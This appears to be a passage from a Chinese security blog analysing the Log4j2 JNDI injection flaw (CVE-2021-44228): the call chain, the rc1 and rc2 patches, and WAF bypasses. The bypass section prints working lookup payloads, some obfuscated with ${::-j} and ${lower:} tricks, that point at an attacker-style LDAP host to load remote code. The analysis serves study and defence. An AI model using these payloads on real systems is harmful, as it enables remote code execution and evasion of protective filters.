<p>JNDI 注入，即当开发者在定义 JNDI 接口初始化时，<code>lookup()</code> 方法的参数可控，攻击者就可以将恶意的 <code>url</code> 传入参数远程加载恶意payload，造成注入攻击。</p>
<h3 id="（二）调试分析"><a href="#（二）调试分析" class="headerlink" title="（二）调试分析"></a>（二）调试分析</h3><p>由于是JNDI注入，因此可以在<code>InitialContext.lookup(String name)</code>方法下断点（也可以在创建的<code>HelloLog4j.java</code>的<code>Logger.error()</code>处下断点一步一步调试过来，但初次分析依然建议在<code>InitialContext</code>下断点，因为调用链较复杂，涉及循环、分支，且中间有一部分与此漏洞的产生关系不大）</p>
<img src="https://img-1310220602.cos.ap-shanghai.myqcloud.com/image-20231012174606575.png" style="zoom: 80%;">

<p><img src="https://img-1310220602.cos.ap-shanghai.myqcloud.com/image-20231012102916281.png"></p>
<p>有几个关键点</p>
<pre class="line-numbers language-java" data-language="java"><code class="language-java"><span class="token class-name">Logger</span><span class="token punctuation">.</span>error
  <span class="token punctuation">.</span><span class="token punctuation">.</span><span class="token punctuation">.</span><span class="token punctuation">.</span><span class="token punctuation">.</span><span class="token punctuation">.</span>
    <span class="token class-name">MessagePatternConverter</span><span class="token punctuation">.</span>format
      <span class="token punctuation">.</span><span class="token punctuation">.</span><span class="token punctuation">.</span><span class="token punctuation">.</span>
        <span class="token class-name">StrSubstitutor</span><span class="token punctuation">.</span>resolveVariable
          <span class="token class-name">Interpolator</span><span class="token punctuation">.</span>lookup
            <span class="token class-name">JndiLookup</span><span class="token punctuation">.</span>lookup
              <span class="token class-name">JndiManager</span><span class="token punctuation">.</span>lookup
                <span class="token class-name">InitialContext</span><span class="token punctuation">.</span>lookup<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<h4 id="1-Logger-error"><a href="#1-Logger-error" class="headerlink" title="1. Logger.error()"></a>1. Logger.error()</h4><p>从<code>Logger.error()</code>处进来</p>
<img src="https://img-1310220602.cos.ap-shanghai.myqcloud.com/image-20231019172132503.png" style="zoom: 80%;">

<p>在进行<code>Logger.error()</code>日志记录时会采用<code>logIfEnabled()</code>方法进行判断，<code>isEnabled()</code>返回为<code>true</code>才可以继续进行日志操作。这里也是漏洞能否成功触发的关键。</p>
<p><img src="https://img-1310220602.cos.ap-shanghai.myqcloud.com/image-20231019172601198.png"></p>
<p>在本次漏洞分析过程中日志等级level为ERROR，它的<code>intLevel()</code>为200，而本环境中默认的日志级别<code>this.intLevel</code>为200（ERROR），正好满足<code>this.intLevel &gt;= level.intLevel()</code>。</p>
<p><img src="https://img-1310220602.cos.ap-shanghai.myqcloud.com/image-20231019173139650.png"></p>
<p>此时<code>filter()</code>方法返回true，即<code>isEnabled()</code>返回为<code>true</code>，成功进入到<code>logMessage()</code>方法中。log4j默认的日志级别定义如下图，从上到下级别逐渐降低，<code>intLevel()</code>数值逐渐增大，分别是：OFF(0)、FATAL(100)、ERROR(200)、WARN(300)、INFO(400)、DEBUG(500)、TRACE(600)、ALL(2147483647)。<strong>由此可见，漏洞能否成功触发与设置的日志Level有关，需要不低于默认日志级别。</strong></p>
<p><img src="https://img-1310220602.cos.ap-shanghai.myqcloud.com/image-20231019174105468.png"></p>
<p>然后中间就是读取配置文件创建event事件等操作，一直到<code>MessagePatternConverter.format()</code>。</p>
<h4 id="2-MessagePatternConverter-format"><a href="#2-MessagePatternConverter-format" class="headerlink" title="2. MessagePatternConverter.format()"></a>2. MessagePatternConverter.format()</h4><p>该方法对日志内容进行解析和格式化，并返回最终格式化后的日志内容。当碰到日志内容中包含<code>${</code>子串时，调用StrSubstitutor进行进一步解析。</p>
<p><img src="https://img-1310220602.cos.ap-shanghai.myqcloud.com/image-20231019200851377.png"></p>
<h4 id="3-StrSubstitutor-resolveVariable"><a href="#3-StrSubstitutor-resolveVariable" class="headerlink" title="3. StrSubstitutor.resolveVariable()"></a>3. StrSubstitutor.resolveVariable()</h4><p>StrSubstitutor将<code>${</code>和<code>}</code>之间的内容提取出来，调用并传递给Interpolator.lookup()方法，实现Lookup功能。</p>
<p><img src="https://img-1310220602.cos.ap-shanghai.myqcloud.com/image-20231019202544583.png"></p>
<p>其中，StrSubstitutor.substitute()会经过如下for循环，匹配<code>:-</code>子串，这里就为后面的waf绕过提供了思路。</p>
<p><img src="https://img-1310220602.cos.ap-shanghai.myqcloud.com/image-20231019201754382.png"></p>
<h4 id="4-Interpolator-lookup"><a href="#4-Interpolator-lookup" class="headerlink" title="4. Interpolator.lookup()"></a>4. Interpolator.lookup()</h4><p>Interpolator实际是一个实现Lookup功能的代理类，该类在成员变量<code>strLookupMap</code>中（**本环境是<code>lookups</code>**）保存着各类Lookup功能的真正实现类。Interpolator对上一步提取出的内容解析后，从<code>strLookupMap</code>获得Lookup功能实现类，并调用实现类的<code>lookup()</code>方法。</p>
<p>例如对本例子中的<code>jndi:ldap://127.0.0.1:1389/Exp</code>解析后得到<code>jndi</code>的Lookup功能实现类为<code>JndiLookup</code>，并调用<code>JndiLookup.lookup()</code>方法。</p>
<img src="https://img-1310220602.cos.ap-shanghai.myqcloud.com/image-20231019203156913.png" style="zoom:80%;">

<h4 id="5-JndiLookup-lookup"><a href="#5-JndiLookup-lookup" class="headerlink" title="5. JndiLookup.lookup()"></a>5. JndiLookup.lookup()</h4><p><code>JndiLookup.lookup()</code>方法调用<code>JndiManager.lookup()</code>方法处理jndi对象。</p>
<img src="https://img-1310220602.cos.ap-shanghai.myqcloud.com/image-20231019203709387.png" style="zoom: 80%;">

<h4 id="6-JndiManager-lookup"><a href="#6-JndiManager-lookup" class="headerlink" title="6. JndiManager.lookup()"></a>6. JndiManager.lookup()</h4><p><code>JndiManager.lookup()</code>直接委托给<code>InitialContext.lookup()</code>方法。这里单独提到该方法，是因为后续的补丁中较为重要的变更即为该方法。</p>
<p><img src="https://img-1310220602.cos.ap-shanghai.myqcloud.com/image-20231019203751594.png"></p>
<p>至此，后续即可按照常规jndi注入路径进行分析。</p>
<h2 id="三、补丁分析"><a href="#三、补丁分析" class="headerlink" title="三、补丁分析"></a>三、补丁分析</h2><h3 id="（一）2-15-0-rc1"><a href="#（一）2-15-0-rc1" class="headerlink" title="（一）2.15.0-rc1"></a>（一）2.15.0-rc1</h3><p>通过比较2.15.0-rc1和该版本之前最后一个版本2.14.1之间的差异，可以发现Log4j2团队在12月5日提交了一个名为<code>Restrict LDAP access via JNDI (#608)</code>的commit。该commit的详细内容如下链接：</p>
<p><a target="_blank" rel="noopener" href="https://github.com/apache/logging-log4j2/commit/c77b3cb39312b83b053d23a2158b99ac7de44dd3">https://github.com/apache/logging-log4j2/commit/c77b3cb39312b83b053d23a2158b99ac7de44dd3</a></p>
<p>除去一些测试代码和辅助代码，该commit最主要内容是在 <code>JndiManager.lookup()</code>方法增加了几种限制，分别是<code>allowedHosts</code>、<code>allowedClasses</code>、<code>allowedProtocols</code>。</p>
<p>由于rc1未在maven中央仓库上，因此需要自行下载代码并构建：</p>
<p>到Log4j2的GitHub官方仓库下载rc1：<a target="_blank" rel="noopener" href="https://github.com/apache/logging-log4j2/releases/tag/log4j-2.15.0-rc1%E3%80%82">https://github.com/apache/logging-log4j2/releases/tag/log4j-2.15.0-rc1。</a></p>
<p>分别进入log4j-api和log4j-core目录，执行<code>mvn clean install -DskipTests</code>。最终会在本地maven仓库上生成rc1的jar包，版本为2.15.0，后续测试使用该jar包。</p>
<p><strong>说明：</strong>此处笔者尝试构建时，maven的国内镜像（阿里云、腾讯云、华为云、网易云）均无法解析2.15.0的jar包</p>
<p><img src="https://img-1310220602.cos.ap-shanghai.myqcloud.com/image-20231020174739501.png"></p>
<p>以下图片参考：<a target="_blank" rel="noopener" href="https://www.freebuf.com/vuls/316143.html">https://www.freebuf.com/vuls/316143.html</a></p>
<p><img src="https://img-1310220602.cos.ap-shanghai.myqcloud.com/image-20231020173958585.png"></p>
<p>各个限制的内容分别如下：</p>
<p><img src="https://img-1310220602.cos.ap-shanghai.myqcloud.com/image-20231020180027074.png"></p>
<p><img src="https://img-1310220602.cos.ap-shanghai.myqcloud.com/image-20231020180053823.png"></p>
<p><img src="https://img-1310220602.cos.ap-shanghai.myqcloud.com/image-20231020180108755.png"></p>
<p>可以看到，rc1补丁通过对JNDI Lookup增加白名单的方式，限制默认可以访问的主机为本地IP，限制默认支持的协议类型为<code>java</code>、<code>ldap</code>、<code>ldaps</code>，限制LDAP协议默认可以使用的Java类型为少数基础类型，从而大大减少了默认的攻击面。</p>
<h3 id="（二）2-15-0-rc2"><a href="#（二）2-15-0-rc2" class="headerlink" title="（二）2.15.0-rc2"></a>（二）2.15.0-rc2</h3><h4 id="1-rc1中存在的问题"><a href="#1-rc1中存在的问题" class="headerlink" title="1. rc1中存在的问题"></a>1. rc1中存在的问题</h4><p>rc1里主要修复的<code>JndiManager.lookup()</code>方法的整体逻辑结构如下：</p>
<pre class="line-numbers language-java" data-language="java"><code class="language-java"><span class="token keyword">public</span> <span class="token keyword">synchronized</span> <span class="token generics"><span class="token punctuation">&lt;</span><span class="token class-name">T</span><span class="token punctuation">&gt;</span></span> <span class="token class-name">T</span> <span class="token function">lookup</span><span class="token punctuation">(</span><span class="token keyword">final</span> <span class="token class-name">String</span> name<span class="token punctuation">)</span> <span class="token keyword">throws</span> <span class="token class-name">NamingException</span> <span class="token punctuation">{</span>
    <span class="token keyword">try</span> <span class="token punctuation">{</span>
        <span class="token class-name">URI</span> uri <span class="token operator">=</span> <span class="token keyword">new</span> <span class="token function">URI</span><span class="token punctuation">(</span>name<span class="token punctuation">)</span><span class="token punctuation">;</span>
        <span class="token keyword">if</span> <span class="token punctuation">(</span>uri<span class="token punctuation">.</span><span class="token function">getScheme</span><span class="token punctuation">(</span><span class="token punctuation">)</span> <span class="token operator">!=</span> <span class="token keyword">null</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
            <span class="token keyword">if</span> <span class="token punctuation">(</span><span class="token operator">!</span>allowedProtocols<span class="token punctuation">.</span><span class="token function">contains</span><span class="token punctuation">(</span>uri<span class="token punctuation">.</span><span class="token function">getScheme</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">.</span><span class="token function">toLowerCase</span><span class="token punctuation">(</span><span class="token class-name">Locale</span><span class="token punctuation">.</span>ROOT<span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
                <span class="token punctuation">.</span><span class="token punctuation">.</span><span class="token punctuation">.</span><span class="token punctuation">.</span><span class="token punctuation">.</span><span class="token punctuation">.</span>
                <span class="token keyword">return</span> <span class="token keyword">null</span><span class="token punctuation">;</span>
            <span class="token punctuation">}</span>
            <span class="token keyword">if</span> <span class="token punctuation">(</span>LDAP<span class="token punctuation">.</span><span class="token function">equalsIgnoreCase</span><span class="token punctuation">(</span>uri<span class="token punctuation">.</span><span class="token function">getScheme</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">)</span> <span class="token operator">||</span> LDAPS<span class="token punctuation">.</span><span class="token function">equalsIgnoreCase</span><span class="token punctuation">(</span>uri<span class="token punctuation">.</span><span class="token function">getScheme</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
                <span class="token keyword">if</span> <span class="token punctuation">(</span><span class="token operator">!</span>allowedHosts<span class="token punctuation">.</span><span class="token function">contains</span><span class="token punctuation">(</span>uri<span class="token punctuation">.</span><span class="token function">getHost</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
                    <span class="token punctuation">.</span><span class="token punctuation">.</span><span class="token punctuation">.</span><span class="token punctuation">.</span><span class="token punctuation">.</span><span class="token punctuation">.</span>
                    <span class="token keyword">return</span> <span class="token keyword">null</span><span class="token punctuation">;</span>
                <span class="token punctuation">}</span>
                <span class="token punctuation">.</span><span class="token punctuation">.</span><span class="token punctuation">.</span><span class="token punctuation">.</span><span class="token punctuation">.</span><span class="token punctuation">.</span>
                            <span class="token keyword">if</span> <span class="token punctuation">(</span><span class="token operator">!</span>allowedClasses<span class="token punctuation">.</span><span class="token function">contains</span><span class="token punctuation">(</span>className<span class="token punctuation">)</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
                                <span class="token punctuation">.</span><span class="token punctuation">.</span><span class="token punctuation">.</span><span class="token punctuation">.</span><span class="token punctuation">.</span><span class="token punctuation">.</span>
                                <span class="token keyword">return</span> <span class="token keyword">null</span><span class="token punctuation">;</span>
                            <span class="token punctuation">}</span>
                <span class="token punctuation">.</span><span class="token punctuation">.</span><span class="token punctuation">.</span><span class="token punctuation">.</span><span class="token punctuation">.</span><span class="token punctuation">.</span>
            <span class="token punctuation">}</span>
        <span class="token punctuation">}</span>
    <span class="token punctuation">}</span> <span class="token keyword">catch</span> <span class="token punctuation">(</span><span class="token class-name">URISyntaxException</span> ex<span class="token punctuation">)</span> <span class="token punctuation">{</span>
        <span class="token comment">// This is OK.</span>
    <span class="token punctuation">}</span>
    <span class="token keyword">return</span> <span class="token punctuation">(</span><span class="token class-name">T</span><span class="token punctuation">)</span> <span class="token keyword">this</span><span class="token punctuation">.</span>context<span class="token punctuation">.</span><span class="token function">lookup</span><span class="token punctuation">(</span>name<span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token punctuation">}</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>从上面的代码结构中可以总结如下的逻辑：</p>
<ul>
<li>对传入的<code>name</code>参数进行前面提到的三类白名单检查。如果检查不通过，则直接返回<code>null</code>。</li>
<li>如果产生<code>URISyntaxException</code>，则对该异常忽略，继续执行<code>this.context.lookup(name)</code>。</li>
<li>如果未产生<code>URISyntaxException</code>，则执行<code>this.context.lookup(name)</code>。</li>
</ul>
<p>重点关注<code>catch</code>代码块，rc1默认不对<code>URISyntaxException</code>异常做任何处理，继续执行后续逻辑，即<code>this.context.lookup(name)</code>。</p>
<p>再看下<code>try</code>代码块中可能产生<code>URISyntaxException</code>的地方。好巧不巧，<code>try</code>代码块的第一个语句就可能产生该异常：<code>URI uri = new URI(name);</code>。</p>
<p>试想一下，如果能构造某个特殊的URI，导致<code>URI uri = new URI(name);</code>语句解析URI异常，抛出<code>URISyntaxException</code>，但又能被<code>this.context.lookup(name)</code>正确处理，不就可以绕过了吗？例如构建一个带空格的URI地址（<code>${jndi:ldap://127.0.0.1:1389/ Exp}</code>，由于撰写本文时无法构建rc1代码，故可参考<a target="_blank" rel="noopener" href="https://www.freebuf.com/vuls/316143.html%EF%BC%89">https://www.freebuf.com/vuls/316143.html）</a></p>
<h4 id="2-rc2的修复方案"><a href="#2-rc2的修复方案" class="headerlink" title="2. rc2的修复方案"></a>2. rc2的修复方案</h4><p>通过比较2.15.0-rc1和2.15.0-rc2之间的差异，可以发现Log4j2团队在12月10日提交了一个名为<code>Handle URI exception</code>的commit。该commit的详细内容如下链接：</p>
<p><a target="_blank" rel="noopener" href="https://github.com/apache/logging-log4j2/commit/bac0d8a35c7e354a0d3f706569116dff6c6bd658">https://github.com/apache/logging-log4j2/commit/bac0d8a35c7e354a0d3f706569116dff6c6bd658</a></p>
<p>该commit主要内容是对rc1中<code>JndiManager.lookup()</code>方法里的<code>catch</code>代码块进行了修改：当<code>URISyntaxException</code>异常被捕获时，直接返回<code>null</code>。从而避免了上面提到的绕过思路。</p>
<p><img src="https://img-1310220602.cos.ap-shanghai.myqcloud.com/image-20231019211658860.png"></p>
<h2 id="四、WAF绕过"><a href="#四、WAF绕过" class="headerlink" title="四、WAF绕过"></a>四、WAF绕过</h2><p>各大厂商针对log4j2漏洞应急方案集合：<a target="_blank" rel="noopener" href="https://mp.weixin.qq.com/s/ZbzLc_N26lgUfvS-mM4R2g">https://mp.weixin.qq.com/s/ZbzLc_N26lgUfvS-mM4R2g</a></p>
<p>由于Log4j2框架几乎是一个类似JDK级别的基础类库，即便自身应用程序里完成了升级，但大量存在依赖引入的其它框架、中间件导致升级工作极为困难，甚至在几年内都无法达到一个可接受的水平。目前，绝大部分公司采取在边界防护设备上使用“临时补丁”的方式。同时，大量bypass方法也随之而来，这将是一个漫长的过程。</p>
<p>WAF主要思路是过滤jndi、ldap、rmi等关键字；过滤<code>ip:port</code></p>
<p>原始payload</p>
<pre class="line-numbers language-none"><code class="language-none">${jndi:ldap://malicious-ldap-server.com/Exp}<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<h3 id="（一）绕过思路1"><a href="#（一）绕过思路1" class="headerlink" title="（一）绕过思路1"></a>（一）绕过思路1</h3><p>前面分析提到过，StrSubstitutor首先会匹配<code>${</code>，然后还会匹配<code>:-</code></p>
<p>以<code>${${::-j}ndi:${::-l}dap://127.0.0.1:1389/Exp}</code>为例</p>
<img src="https://img-1310220602.cos.ap-shanghai.myqcloud.com/image-20231020203630144.png" style="zoom:80%;">

<p>如果找到<code>:-</code>，就截取<code>:-</code>之前的变量赋值给varName，截取<code>:-</code>到末尾的字符串赋值为varDefaultValve，然后就跳出循环。</p>
<p>然后使用resolveVariable() 对varName的内容进行判断，如果不匹配任何log4j2支持的协议，就返回null（这里varName的值为<code>:</code>）。之后就会把varDefaultValve的值（这里为<code>j</code>）赋给varValue。然后再用varValue替换整个<code>${::-j}</code>，即最后结果为<code>jndi:ldap://127.0.0.1:1389/Exp</code>。</p>
<p><img src="https://img-1310220602.cos.ap-shanghai.myqcloud.com/image-20231020203728230.png"></p>
<p>所以绕过的方法可以是：</p>
<pre class="line-numbers language-none"><code class="language-none">${任意字符串:-实际想要的字符串} = 实际想要的字符串<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<pre class="line-numbers language-none"><code class="language-none">${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://127.0.0.1:1389/Exp}<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p><strong>注意：</strong>这里的任意字符串不能为log4j2支持的Interpolator前缀。</p>
<h3 id="（二）绕过思路2"><a href="#（二）绕过思路2" class="headerlink" title="（二）绕过思路2"></a>（二）绕过思路2</h3><p>Interpolator除jndi外，还支持解析很多其它前缀，如<code>env</code>、<code>lower</code>、<code>upper</code>，所以可以用如下思路来处理关键字（部分版本不支持<code>lower</code>、<code>upper</code>等协议）：</p>
<pre class="line-numbers language-none"><code class="language-none">${jndi:${lower:l}${lower:d}a${lower:p}://127.0.0.1:1389/Exp}<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<h3 id="（三）绕过思路3"><a href="#（三）绕过思路3" class="headerlink" title="（三）绕过思路3"></a>（三）绕过思路3</h3><p>针对过滤<code>ip:port</code>，可用域名代替或用默认端口开启ldap服务</p>
<pre class="line-numbers language-none"><code class="language-none">${jndi:ldap://malicious-ldap-server.com/Exp}
${jndi:ldap://malicious-ip/Exp}	#此时需要ldap服务端口为389<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span></span></code></pre>

<h2 id="五、思考"><a href="#五、思考" class="headerlink" title="五、思考"></a>五、思考</h2><p>Log4j2漏洞就其自身原理来说，并不复杂，本质上就是jndi注入，分析过程也主要聚焦于jndi注入的产生过程。rc1中采用较为严格的白名单策略，从应急处理的角度看无可厚非。但从历史上发生的各类漏洞修补过程来看，必定会有各种地方遗漏导致后续不断地打补丁。对于WAF的绕过，纵观古今漏洞，往往能在漏洞产生路线的周围找到绕过思路，就像高速公路一样，总会有“事故多发路段”。从软件开发角度讲，与其在上线后不停修复打补丁，不如在开发早期，即设计阶段或者开发阶段，尽量避免这类有可能产生安全风险的设计。在2.16.0版本，Log4j2团队干脆默认禁用掉了JNDI Lookup功能。</p>
<p>另外，rc1中<code>catch</code>代码对异常的处理方式，在日常开发过程中也是容易犯的问题。软件开发中有一个安全原则：<code>Fail Securely</code>，意思是业务系统能够正确安全地处理各种异常和错误。虽然业务开发有时会为了便利性而牺牲一部分安全性，但对于Log4j此类偏底层的强依赖性类库，还是需要严格处理各种可能出现的错误和异常。</p>
<p>阿里云工程师发现Apache Log4j2组件漏洞后，按业界惯例向软件开发方Apache开源社区报告这一问题。但最终工信部网络安全管理局决定暂停阿里云作为上述合作单位6个月。对此，笔者想引用艾公的一句话作为结尾：尊严只在剑锋之上，真理只在大炮射程之内。</p>
<h2 id="参考"><a href="#参考" class="headerlink" title="参考"></a>参考</h2><p>记录一次log4j复现之旅（复现不了你来找我）：<a target="_blank" rel="noopener" href="https://blog.csdn.net/lmboss/article/details/123927020">https://blog.csdn.net/lmboss/article/details/123927020</a></p>
<p>Log4j2的JNDI注入漏洞（CVE-2021-44228）原理分析与思考：<a target="_blank" rel="noopener" href="https://www.freebuf.com/vuls/316143.html">https://www.freebuf.com/vuls/316143.html</a></p>
<p>Apache Log4j2 Jndi RCE 高危漏洞分析与防御：<a target="_blank" rel="noopener" href="https://paper.seebug.org/1787/">https://paper.seebug.org/1787/</a></p>
<p><a target="_blank" rel="noopener" href="https://myzxcg.com/2022/01/Log4j2-%E5%88%A9%E7%94%A8%E9%93%BE%E4%B8%8EWaf%E7%BB%95%E8%BF%87%E5%88%86%E6%9E%90/">Log4j2 利用链与Waf绕过分析</a></p>
<p>Apache log4j2 远程命令执行漏洞复现：<a target="_blank" rel="noopener" href="https://cloud.tencent.com/developer/article/2148989">https://cloud.tencent.com/developer/article/2148989</a></p>
<p>log4j waf 绕过技巧：<a target="_blank" rel="noopener" href="https://www.cnblogs.com/ph4nt0mer/p/15701647.html">https://www.cnblogs.com/ph4nt0mer/p/15701647.html</a></p>

                
            </div>
            <hr/>

            

    <div class="reprint" id="reprint-statement">
        
            <div class="reprint__author">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-user">
                        文章作者:
                    </i>
                </span>
                <span class="reprint-info">
                    <a href="https://wa0er.github.io" rel="external nofollow noreferrer">wa0er</a>
                </span>
            </div>
            <div class="reprint__type">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-link">
                        文章链接:
                    </i>
                </span>
                <span class="reprint-info">
                    <a href="https://wa0er.github.io/posts/1e9a0fae.html">https://wa0er.github.io/posts/1e9a0fae.html</a>
                </span>
            </div>
            <div class="reprint__notice">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-copyright">
                        版权声明:
                    </i>
                </span>
                <span class="reprint-info">
                    本博客所有文章除特別声明外，均采用
                    <a href="https://creativecommons.org/licenses/by-nc/4.0/deed.zh" rel="external nofollow noreferrer" target="_blank">CC BY-NC 4.0</a>
                    许可协议。转载请注明来源
                    <a href="https://wa0er.github.io" target="_blank">wa0er</a>
                    !
                </span>
            </div>
        
    </div>

    <script async defer>
      document.addEventListener("copy", function (e) {
        let toastHTML = '<span>复制成功，请遵循本文的转载规则</span><button class="btn-flat toast-action" onclick="navToReprintStatement()" style="font-size: smaller">查看</a>';
        M.toast({html: toastHTML})
      });

      function navToReprintStatement() {
        $("html, body").animate({scrollTop: $("#reprint-statement").offset().top - 80}, 800);
      }
    </script>



            <div class="tag_share" style="display: block;">
                <div class="post-meta__tag-list" style="display: inline-block;">
                    
                        <div class="article-tag">
                            
                                <a href="/tags/Log4j2/">
                                    <span class="chip bg-color">Log4j2</span>
                                </a>
                            
                                <a href="/tags/JNDI%E6%B3%A8%E5%85%A5/">
                                    <span class="chip bg-color">JNDI注入</span>
                                </a>
                            
                                <a href="/tags/CVE-2021-44228%EF%BC%88Log4j2%EF%BC%89/">
                                    <span class="chip bg-color">CVE-2021-44228（Log4j2）</span>
                                </a>
                            
                        </div>
                    
                </div>
                <div class="post_share" style="zoom: 80%; width: fit-content; display: inline-block; float: right; margin: -0.15rem 0;">
                    <link rel="stylesheet" type="text/css" href="/libs/share/css/share.min.css">
<div id="article-share">

    
    <div class="social-share" data-sites="wechat,qq,weibo,qzone,twitter" data-wechat-qrcode-helper="<p>微信扫一扫即可分享！</p>"></div>
    <script src="/libs/share/js/social-share.min.js"></script>
    

    

</div>

                </div>
            </div>
            
                <style>
    #reward {
        margin: 40px 0;
        text-align: center;
    }

    #reward .reward-link {
        font-size: 1.4rem;
        line-height: 38px;
    }

    #reward .btn-floating:hover {
        box-shadow: 0 6px 12px rgba(0, 0, 0, 0.2), 0 5px 15px rgba(0, 0, 0, 0.2);
    }

    #rewardModal {
        width: 320px;
        height: 350px;
    }

    #rewardModal .reward-title {
        margin: 15px auto;
        padding-bottom: 5px;
    }

    #rewardModal .modal-content {
        padding: 10px;
    }

    #rewardModal .close {
        position: absolute;
        right: 15px;
        top: 15px;
        color: rgba(0, 0, 0, 0.5);
        font-size: 1.3rem;
        line-height: 20px;
        cursor: pointer;
    }

    #rewardModal .close:hover {
        color: #ef5350;
        transform: scale(1.3);
        -moz-transform:scale(1.3);
        -webkit-transform:scale(1.3);
        -o-transform:scale(1.3);
    }

    #rewardModal .reward-tabs {
        margin: 0 auto;
        width: 210px;
    }

    .reward-tabs .tabs {
        height: 38px;
        margin: 10px auto;
        padding-left: 0;
    }

    .reward-content ul {
        padding-left: 0 !important;
    }

    .reward-tabs .tabs .tab {
        height: 38px;
        line-height: 38px;
    }

    .reward-tabs .tab a {
        color: #fff;
        background-color: #ccc;
    }

    .reward-tabs .tab a:hover {
        background-color: #ccc;
        color: #fff;
    }

    .reward-tabs .wechat-tab .active {
        color: #fff !important;
        background-color: #22AB38 !important;
    }

    .reward-tabs .alipay-tab .active {
        color: #fff !important;
        background-color: #019FE8 !important;
    }

    .reward-tabs .reward-img {
        width: 210px;
        height: 210px;
    }
</style>

<div id="reward">
    <a href="#rewardModal" class="reward-link modal-trigger btn-floating btn-medium waves-effect waves-light red">赏</a>

    <!-- Modal Structure -->
    <div id="rewardModal" class="modal">
        <div class="modal-content">
            <a class="close modal-close"><i class="fas fa-times"></i></a>
            <h4 class="reward-title">祝客官顺风顺水顺财神</h4>
            <div class="reward-content">
                <div class="reward-tabs">
                    <ul class="tabs row">
                        <li class="tab col s6 alipay-tab waves-effect waves-light"><a href="#alipay">支付宝</a></li>
                        <li class="tab col s6 wechat-tab waves-effect waves-light"><a href="#wechat">微 信</a></li>
                    </ul>
                    <div id="alipay">
                        <img src="/medias/reward/alipay.jpg" class="reward-img" alt="支付宝打赏二维码">
                    </div>
                    <div id="wechat">
                        <img src="/medias/reward/wepay.jpg" class="reward-img" alt="微信打赏二维码">
                    </div>
                </div>
            </div>
        </div>
    </div>
</div>

<script>
    $(function () {
        $('.tabs').tabs();
    });
</script>

            
        </div>
    </div>

    

    

    

    

    
        <style>
    .valine-card {
        margin: 1.5rem auto;
    }

    .valine-card .card-content {
        padding: 20px 20px 5px 20px;
    }

    #vcomments textarea {
        box-sizing: border-box;
        background: url("/medias/comment_bg.png") 100% 100% no-repeat;
    }

    #vcomments p {
        margin: 2px 2px 10px;
        font-size: 1.05rem;
        line-height: 1.78rem;
    }

    #vcomments blockquote p {
        text-indent: 0.2rem;
    }

    #vcomments a {
        padding: 0 2px;
        color: #4cbf30;
        font-weight: 500;
        text-decoration: none;
    }

    #vcomments img {
        max-width: 100%;
        height: auto;
        cursor: pointer;
    }

    #vcomments ol li {
        list-style-type: decimal;
    }

    #vcomments ol,
    ul {
        display: block;
        padding-left: 2em;
        word-spacing: 0.05rem;
    }

    #vcomments ul li,
    ol li {
        display: list-item;
        line-height: 1.8rem;
        font-size: 1rem;
    }

    #vcomments ul li {
        list-style-type: disc;
    }

    #vcomments ul ul li {
        list-style-type: circle;
    }

    #vcomments table, th, td {
        padding: 12px 13px;
        border: 1px solid #dfe2e5;
    }

    #vcomments table, th, td {
        border: 0;
    }

    table tr:nth-child(2n), thead {
        background-color: #fafafa;
    }

    #vcomments table th {
        background-color: #f2f2f2;
        min-width: 80px;
    }

    #vcomments table td {
        min-width: 80px;
    }

    #vcomments h1 {
        font-size: 1.85rem;
        font-weight: bold;
        line-height: 2.2rem;
    }

    #vcomments h2 {
        font-size: 1.65rem;
        font-weight: bold;
        line-height: 1.9rem;
    }

    #vcomments h3 {
        font-size: 1.45rem;
        font-weight: bold;
        line-height: 1.7rem;
    }

    #vcomments h4 {
        font-size: 1.25rem;
        font-weight: bold;
        line-height: 1.5rem;
    }

    #vcomments h5 {
        font-size: 1.1rem;
        font-weight: bold;
        line-height: 1.4rem;
    }

    #vcomments h6 {
        font-size: 1rem;
        line-height: 1.3rem;
    }

    #vcomments p {
        font-size: 1rem;
        line-height: 1.5rem;
    }

    #vcomments hr {
        margin: 12px 0;
        border: 0;
        border-top: 1px solid #ccc;
    }

    #vcomments blockquote {
        margin: 15px 0;
        border-left: 5px solid #42b983;
        padding: 1rem 0.8rem 0.3rem 0.8rem;
        color: #666;
        background-color: rgba(66, 185, 131, .1);
    }

    #vcomments pre {
        font-family: monospace, monospace;
        padding: 1.2em;
        margin: .5em 0;
        background: #272822;
        overflow: auto;
        border-radius: 0.3em;
        tab-size: 4;
    }

    #vcomments code {
        font-family: monospace, monospace;
        padding: 1px 3px;
        font-size: 0.92rem;
        color: #e96900;
        background-color: #f8f8f8;
        border-radius: 2px;
    }

    #vcomments pre code {
        font-family: monospace, monospace;
        padding: 0;
        color: #e8eaf6;
        background-color: #272822;
    }

    #vcomments pre[class*="language-"] {
        padding: 1.2em;
        margin: .5em 0;
    }

    #vcomments code[class*="language-"],
    pre[class*="language-"] {
        color: #e8eaf6;
    }

    #vcomments [type="checkbox"]:not(:checked), [type="checkbox"]:checked {
        position: inherit;
        margin-left: -1.3rem;
        margin-right: 0.4rem;
        margin-top: -1px;
